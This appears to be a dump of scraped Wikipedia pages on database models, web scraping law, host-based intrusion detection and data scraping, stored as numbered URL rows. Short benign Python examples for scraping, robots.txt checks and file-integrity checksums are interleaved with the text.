(The terms data model and database model are often used interchangeably, but in this article we use data model for the design of a specific database, and database model for the modeling notation used to express that design). The most popular database model for general-purpose databases is the relational model, or more precisely, the relational model as represented by the SQL language. The process of creating a logical database design using this model uses a methodical approach known as normalization. The goal of normalization is to ensure that each elementary "fact" is only recorded in one place, so that insertions, updates, and deletions automatically maintain consistency. The final stage of database design is to make the decisions that affect performance, scalability, recovery, security, and the like, which depend on the particular DBMS. This is often called physical database design, and the output is the physical data model. A key goal during this stage is data independence, meaning that the decisions made for performance optimization purposes should be invisible to end-users and applications. There are two types of data independence: Physical data independence and logical data independence. Physical design is driven mainly by performance requirements, and requires a good knowledge of the expected workload and access patterns, and a deep understanding of the features offered by the chosen DBMS. Another aspect of physical database design is security. It involves both defining access control to database objects as well as defining security levels and methods for the data itself. A database model is a type of data model that determines the logical structure of a database and fundamentally determines in which manner data can be stored, organized, and manipulated. The most popular example of a database model is the relational model (or the SQL approximation of relational), which uses a table-based format. Common logical data models for databases include: An object relational database combines the two related structures. Physical data models include: Other models include: Specialized models are optimized for particular types of data: A database management system provides three views of the database data: While there is typically only one conceptual and internal view of the data, there can be any number of different external views. This allows users to see database information in a more business-related way rather than from a technical, processing viewpoint. For example, a financial department of a company needs the payment details of all employees as part of the company's expenses, but does not need details about employees that are in the interest of the human resources department. Thus different departments need different views of the company's database. The three-level database architecture relates to the concept of data independence which was one of the major initial driving forces of the relational model. 39 The idea is that changes made at a certain level do not affect the view at a higher level. For example, changes in the internal level do not affect application programs written using conceptual level interfaces, which reduces the impact of making physical changes to improve performance. The conceptual view provides a level of indirection between internal and external. On the one hand it provides a common view of the database, independent of different external view structures, and on the other hand it abstracts away details of how the data are stored or managed (internal level). 
In principle every level, and even every external view, can be presented by a different data model. In practice usually a given DBMS uses the same data model for both the external and the conceptual levels (e.g., relational model). The internal level, which is hidden inside the DBMS and depends on its implementation, requires a different level of detail and uses its own types of data structure types. Database technology has been an active research topic since the 1960s, both in academia and in the research and development groups of companies (for example IBM Research). Research activity includes theory and development of prototypes. Notable research topics have included models, the atomic transaction concept, related concurrency control techniques, query languages and query optimization methods, RAID, and more. The database research area has several dedicated academic journals (for example, ACM Transactions on Database Systems-TODS, Data and Knowledge Engineering-DKE) and annual conferences (e.g., ACM SIGMOD, ACM PODS, VLDB, IEEE ICDE). |
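The external-view idea from the passage above (for example, a finance department that should see payment details but not other employee data) can be sketched as a SQL view through sqlite3; the employee schema is hypothetical.

import sqlite3

con = sqlite3.connect(":memory:")
con.execute("""CREATE TABLE employee (
    emp_id INTEGER PRIMARY KEY, name TEXT, salary REAL, medical_notes TEXT)""")
con.execute("INSERT INTO employee VALUES (1, 'Ada', 5200.0, 'confidential')")

# An external view for the finance department: payment-related columns only.
con.execute("CREATE VIEW payroll AS SELECT emp_id, name, salary FROM employee")

print(list(con.execute("SELECT * FROM payroll")))
con.close()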
248 | https://en.wikipedia.org/wiki/Web_scraping | https://www.worldcat.org/issn/1683-1470 | We’re sorry, but WorldCat does not work without JavaScript enabled. Please enable JavaScript on your browser. WorldCat is the world’s largest library catalog, helping you find library materials online. |
249 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/File:Question_book-new.svg | Original file (SVG file, nominally 512 399 pixels, file size: 13 KB) The source code of this SVG is valid. English: A new incarnation of Image:Question book 3.svg, which was uploaded by user AzaToth Created from scratch in Adobe Illustrator. Based on Image:Question book.png created by User:Equazcion May 29, 2008 Tkgd2007 See licensing. GFDL GNU Free Documentation License en.wikipedia.org wiki Wikipedia:Text of the GNU Free Documentation License This licensing tag was added to this file as part of the GFDL licensing update. Click on a date time to view the file as it appeared at that time. You cannot overwrite this file. The following file is a duplicate of this file (more details): More than 100 pages use this file. The following list shows the first 100 pages that use this file only. A full list is available. View more links to this file. This file contains additional information, probably added from the digital camera or scanner used to create or digitize it. If the file has been modified from its original state, some details may not fully reflect the modified file. |
250 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-12 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
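The fetch-then-extract flow described above can be sketched in a few lines with the requests and BeautifulSoup libraries; the target URL and the choice of elements to extract are picked only as an example.

import requests
from bs4 import BeautifulSoup

url = "https://en.wikipedia.org/wiki/Web_scraping"  # example target
response = requests.get(url, timeout=10)
response.raise_for_status()

# Parse the fetched HTML and copy out something specific: link text and URLs here.
soup = BeautifulSoup(response.text, "html.parser")
for link in soup.find_all("a", href=True)[:10]:
    print(link.get_text(strip=True), "->", link["href"])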
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
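The grep-style, regular-expression approach mentioned above can be sketched as follows; the pattern and the sample markup are invented, and real pages are rarely this regular, which is one reason DOM parsing is usually preferred.

import re

# Sample markup for illustration only.
html = "<li>Widget A - $19.99</li><li>Widget B - $5.00</li>"

# A simple pattern capturing product name and price; brittle, but it shows the idea.
pattern = re.compile(r"<li>(.*?) - \$(\d+\.\d{2})</li>")
for name, price in pattern.findall(html):
    print(name, float(price))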
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA) and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's web-search software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen scraping was illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" to Southwest's site. It also claimed that the practice constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer", as well as what is legally known as "Misappropriation and Unjust Enrichment", and that it breaches the web site's user agreement. Outtask denied all these claims, arguing that the prevailing law in this case should be US copyright law and that, under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses, and later sued in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore an emerging pattern that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system, and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc., the United States District Court for the Eastern District of Virginia ruled that the terms of use must be brought to the users' attention in order for a browse-wrap contract or license to be enforced. 
16 In a 2014 case filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleged that Resultly "excessively crawled" QVC's retail site (allegedly sending 200-300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of its website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned it to the Ninth Circuit for reconsideration in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 The Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to constitute a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Apart from a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
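The specific anti-bot techniques are not reproduced in the entry above, but one of the most common administrator-side measures is a robots.txt policy combined with rate limiting. The sketch below is purely illustrative, with a placeholder URL and bot name, and shows how a well-behaved scraper can check robots.txt and honour a declared crawl delay before fetching a page.

import time
import requests
from urllib.parse import urlparse
from urllib.robotparser import RobotFileParser

def polite_fetch(url, user_agent="MyResearchBot"):
    # Consult the site's robots.txt, one of the most common administrator-side controls
    origin = urlparse(url)
    rp = RobotFileParser()
    rp.set_url(f"{origin.scheme}://{origin.netloc}/robots.txt")
    rp.read()
    if not rp.can_fetch(user_agent, url):
        return None  # the administrator has disallowed this path for bots
    # Honour any declared crawl delay so requests stay below the site's rate limits
    time.sleep(rp.crawl_delay(user_agent) or 1)
    return requests.get(url, headers={"User-Agent": user_agent}, timeout=10).text

# html = polite_fetch("https://example.com/some/page")  # placeholder URL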
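The grep-style, regular-expression approach described at the start of the entry above can be sketched in a few lines of Python. The URL and the e-mail pattern below are illustrative assumptions only, not part of the scraped text.

import re
import requests

def scrape_with_regex(url, pattern):
    # Fetch the raw HTML with a plain HTTP request (no browser, no JavaScript execution)
    html = requests.get(url, timeout=10).text
    # Apply a grep-style regular expression to the page source
    return re.findall(pattern, html)

# Example: pull anything that looks like an e-mail address from a hypothetical page
emails = scrape_with_regex("https://example.com/contact", r"[\w.+-]+@[\w-]+\.[\w.-]+")
print(emails)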
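For the first tool in the list above, a minimal BeautifulSoup sketch (using the requests and bs4 packages installed at the top of this notebook) might look as follows; the target URL is a placeholder.

import requests
from bs4 import BeautifulSoup

def extract_links(url):
    # Download the page and parse it into a navigable DOM-like tree
    response = requests.get(url, timeout=10)
    soup = BeautifulSoup(response.text, "html.parser")
    title = soup.title.string if soup.title else None
    # Collect the href attribute of every anchor tag that has one
    links = [a["href"] for a in soup.find_all("a", href=True)]
    return title, links

title, links = extract_links("https://example.com")
print(title, len(links))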
251 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Wikipedia:General_disclaimer | Wikipedia makes no guarantee of validity Wikipedia is an online open-content collaborative encyclopedia; that is, a voluntary association of individuals and groups working to develop a common resource of human knowledge. The structure of the project allows anyone with an Internet connection to alter its content. Please be advised that nothing found here has necessarily been reviewed by people with the expertise required to provide you with complete, accurate, or reliable information. That is not to say that you will not find valuable and accurate information in Wikipedia; much of the time you will. However, Wikipedia cannot guarantee the validity of the information found here. The content of any given article may recently have been changed, vandalized, or altered by someone whose opinion does not correspond with the state of knowledge in the relevant fields. Note that most other encyclopedias and reference works also have disclaimers. Our active community of editors uses tools such as the Special:RecentChanges and Special:NewPages feeds to monitor new and changing content. However, Wikipedia is not uniformly peer reviewed; while readers may correct errors or engage in casual peer review, they have no legal duty to do so and thus all information read here is without any implied warranty of fitness for any purpose or use whatsoever. Even articles that have been vetted by informal peer review or featured article processes may later have been edited inappropriately, just before you view them. None of the contributors, sponsors, administrators, or anyone else connected with Wikipedia in any way whatsoever can be responsible for the appearance of any inaccurate or libelous information or for your use of the information contained in or linked from these web pages. Please make sure that you understand that the information provided here is being provided freely, and that no kind of agreement or contract is created between you and the owners or users of this site, the owners of the servers upon which it is housed, the individual Wikipedia contributors, any project administrators, sysops, or anyone else who is in any way connected with this project or sister projects subject to your claims against them directly. You are being granted a limited license to copy anything from this site; it does not create or imply any contractual or extracontractual liability on the part of Wikipedia or any of its agents, members, organizers, or other users. There is no agreement or understanding between you and Wikipedia regarding your use or modification of this information beyond the Creative Commons Attribution-Sharealike 4.0 Unported License (CC BY-SA) and the GNU Free Documentation License (GFDL); neither is anyone at Wikipedia responsible should someone change, edit, modify, or remove any information that you may post on Wikipedia or any of its associated projects. Any of the trademarks, service marks, collective marks, design rights, or similar rights that are mentioned, used, or cited in the articles of the Wikipedia encyclopedia are the property of their respective owners. Their use here does not imply that you may use them for any purpose other than for the same or a similar informational use as contemplated by the original authors of these Wikipedia articles under the CC BY-SA and GFDL licensing schemes. 
Unless otherwise stated, Wikipedia and Wikimedia sites are neither endorsed by, nor affiliated with, any of the holders of any such rights, and as such, Wikipedia cannot grant any rights to use any otherwise protected materials. Your use of any such or similar incorporeal property is at your own risk. Wikipedia contains material which may portray an identifiable person who is alive or recently-deceased. The use of images of living or recently-deceased individuals is, in some jurisdictions, restricted by laws pertaining to personality rights, independent from their copyright status. Before using these types of content, please ensure that you have the right to use it under the laws which apply in the circumstances of your intended use. You are solely responsible for ensuring that you do not infringe someone else's personality rights. Publication of information found in Wikipedia may be in violation of the laws of the country or jurisdiction from where you are viewing this information. The Wikipedia database is stored on servers in the United States of America, and is maintained in reference to the protections afforded under local and federal law. Laws in your country or jurisdiction may not protect or allow the same kinds of speech or distribution. Wikipedia does not encourage the violation of any laws, and cannot be responsible for any violations of such laws, should you link to this domain, or use, reproduce, or republish the information contained herein. If you need specific advice (for example, medical, legal, financial, or risk management), please seek a professional who is licensed or knowledgeable in that area. |
252 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit&section=20 | You do not have permission to edit this page. |
253 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Host-based_intrusion_detection_system | A host-based intrusion detection system (HIDS) is an intrusion detection system that is capable of monitoring and analyzing the internals of a computing system as well as the network packets on its network interfaces, similar to the way a network-based intrusion detection system (NIDS) operates. 1 HIDS focuses on more granular and internal attacks by concentrating its monitoring on host activities instead of overall network traffic. 2 HIDS was the first type of intrusion detection software to have been designed, with the original target system being the mainframe computer, where outside interaction was infrequent. 3 One major issue with using HIDS is that it needs to be installed on each and every computer that needs protection from intrusions, which can slow down device performance and burden the intrusion detection system itself. 4 A host-based IDS is capable of monitoring all or parts of the dynamic behavior and the state of a computer system, based on how it is configured. Besides such activities as dynamically inspecting network packets targeted at this specific host (an optional component in most commercially available software solutions), a HIDS might detect which program accesses what resources and discover that, for example, a word processor has suddenly and inexplicably started modifying the system password database. Similarly, a HIDS might look at the state of a system and its stored information, whether in RAM, in the file system, in log files or elsewhere, and check that the contents of these appear as expected, e.g. have not been changed by intruders. 5 One can think of a HIDS as an agent that monitors whether anything or anyone, whether internal or external, has circumvented the system's security policy. In comparison to network-based intrusion detection systems, HIDS is advantageous because of its capability of identifying internal attacks. While a NIDS examines data from network traffic, a HIDS examines data originating from operating systems. In recent years, HIDS has been faced with the big-data challenge, which can be attributed to the increased advancement of data center facilities and methodologies. 6 Many computer users have encountered tools that monitor dynamic system behavior in the form of anti-virus (AV) packages. While AV programs often also monitor system state, they do spend a lot of their time looking at who is doing what inside a computer and whether a given program should or should not have access to particular system resources. The lines become blurred here, as many of the tools overlap in functionality. Some intrusion prevention systems protect against buffer overflow attacks on system memory and can enforce security policy. 7 The principal operation of a HIDS depends on the fact that successful intruders (hackers) will generally leave a trace of their activities. In fact, such intruders often want to own the computer they have attacked, and will establish their "ownership" by installing software that will grant them future access to carry out whatever activity (keystroke logging, identity theft, spamming, botnet activity, spyware usage, etc.) they envisage. In theory, a computer user has the ability to detect any such modifications, and the HIDS attempts to do just that and reports its findings. Ideally a HIDS works in conjunction with a NIDS, such that a HIDS finds anything that slips past the NIDS. 
Commercially available software solutions often do correlate the findings from NIDS and HIDS in order to find out whether a network intruder has been successful or not at the targeted host. Most successful intruders, on entering a target machine, immediately apply best-practice security techniques to secure the system which they have infiltrated, leaving only their own backdoor open, so that other intruders cannot take over their computers. In general, a HIDS uses a database (object-database) of system objects it should monitor, usually (but not necessarily) file system objects. A HIDS could also check that appropriate regions of memory have not been modified, for example the system call table on Linux and various vtable structures in Microsoft Windows. For each object in question, a HIDS will usually remember its attributes (permissions, size, modification dates) and create a checksum of some kind (an MD5 or SHA-1 hash, or similar) for the contents, if any. This information gets stored in a secure database for later comparison (the checksum database); a simplified sketch of this baseline-and-verify cycle appears after this entry. An alternative to a HIDS would be to provide NIDS-type functionality at the network interface (NIC) level of an end-point (a server, workstation or other end device). Providing HIDS at the network layer has the advantage of providing more detailed logging of the source (IP address) of the attack and of attack details, such as packet data, neither of which a dynamic behavioral monitoring approach could see. At installation time, and whenever any of the monitored objects change legitimately, a HIDS must initialize its checksum database by scanning the relevant objects. Persons in charge of computer security need to control this process tightly in order to prevent intruders from making unauthorized changes to the database(s). Such initialization thus generally takes a long time and involves cryptographically locking each monitored object and the checksum databases. Because of this, manufacturers of HIDS usually construct the object-database in such a way that frequent updates to the checksum database are unnecessary. Computer systems generally have many dynamic (frequently changing) objects which intruders want to modify and which a HIDS thus should monitor, but their dynamic nature makes them unsuitable for the checksum technique. To overcome this problem, HIDS employ various other detection techniques: monitoring changing file attributes, log files that have decreased in size since last checked, and numerous other means of detecting unusual events. Once a system administrator has constructed a suitable object-database (ideally with help and advice from the HIDS installation tools) and initialized the checksum database, the HIDS has all it requires to scan the monitored objects regularly and to report on anything that may appear to have gone wrong. Reports can take the form of logs, e-mails or similar. A HIDS will usually go to great lengths to prevent the object-database, checksum database and its reports from any form of tampering. After all, if intruders succeed in modifying any of the objects the HIDS monitors, nothing can stop such intruders from modifying the HIDS itself unless security administrators take appropriate precautions. Many worms and viruses will try to disable anti-virus tools, for example. Apart from crypto-techniques, HIDS might allow administrators to store the databases on a CD-ROM or on other read-only memory devices (another factor in favor of infrequent updates) or to store them in some off-system memory. 
Similarly, a HIDS will often send its logs off-system immediately, typically using VPN channels to some central management system. One could argue that the trusted platform module comprises a type of HIDS. Although its scope differs in many ways from that of a HIDS, fundamentally it provides a means to identify whether anything or anyone has tampered with a portion of a computer. Architecturally this provides the ultimate (at least at this point in time) host-based intrusion detection, as it depends on hardware external to the CPU itself, thus making it that much harder for an intruder to corrupt its object and checksum databases. InfoWorld states that host-based intrusion-detection system software is a useful way for network managers to find malware, and suggests they run it on every server, not just critical servers. 8 |
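As a rough sketch of the off-system log forwarding mentioned at the start of the entry above, the snippet below pushes HIDS alerts to a hypothetical central syslog collector (logs.example.internal is an assumed hostname, not from the original text); real deployments would typically wrap this in a VPN or otherwise authenticated channel.

import logging
import logging.handlers

# Forward alerts to a remote syslog collector so a local intruder cannot quietly erase them
handler = logging.handlers.SysLogHandler(address=("logs.example.internal", 514))
logger = logging.getLogger("hids")
logger.setLevel(logging.WARNING)
logger.addHandler(handler)

logger.warning("checksum mismatch detected on /etc/passwd")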
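The object-database and checksum-database cycle described earlier in that entry can be approximated with a short Python sketch. This is a simplified illustration, not any particular HIDS product: the monitored paths are placeholders, and SHA-256 is used in place of the MD5/SHA-1 hashes mentioned in the text.

import hashlib
import json
import os

MONITORED = ["/etc/passwd", "/etc/hosts"]  # placeholder object list

def checksum(path):
    # Hash the file contents in chunks so large objects do not exhaust memory
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

def build_baseline(db_path="baseline.json"):
    # Record a hash and size for every monitored object (the "checksum database")
    baseline = {p: {"hash": checksum(p), "size": os.path.getsize(p)}
                for p in MONITORED if os.path.exists(p)}
    with open(db_path, "w") as f:
        json.dump(baseline, f)

def verify(db_path="baseline.json"):
    # Re-hash each object and report anything that changed or disappeared
    with open(db_path) as f:
        baseline = json.load(f)
    for path, attrs in baseline.items():
        if not os.path.exists(path) or checksum(path) != attrs["hash"]:
            print(f"ALERT: {path} has been modified or removed")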
254 | https://en.wikipedia.org/wiki/Web_scraping | https://www.scribd.com/doc/249068700/LinkedIn-v-Resultly-LLC-Complaint?secret_password=pEVKDbnvhQL52oKfdrmT | LinkedIn v. Resultly, LLC - Complaint |
255 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#bodyContent | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
